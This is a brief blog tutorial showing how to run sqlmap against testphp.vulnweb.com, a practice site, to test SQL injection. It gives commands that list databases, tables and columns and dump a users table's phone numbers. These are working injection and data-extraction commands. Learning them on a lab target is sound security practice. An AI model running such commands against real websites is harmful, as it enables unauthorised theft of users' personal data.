SQL Injection Testing Using SQLMAP

Try out SQLMAP on this vulnerable website: testphp.vulnweb.com

Test out a simple SQL injection with ‘ at the end of the url.

Let’s try with SQLMAP

Finding databases

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs

–dbs lists all the available databases.

2 databases available

Finding tables inside the database

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1  -D acuart — tables

Finding columns in the database

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1  -D acuart -T users –columns

Dump the data

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C phone --dump
Gets info on Phone numbers

Use the same command with the various columns to retrieve data.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

Comments (

0

)

%d bloggers like this: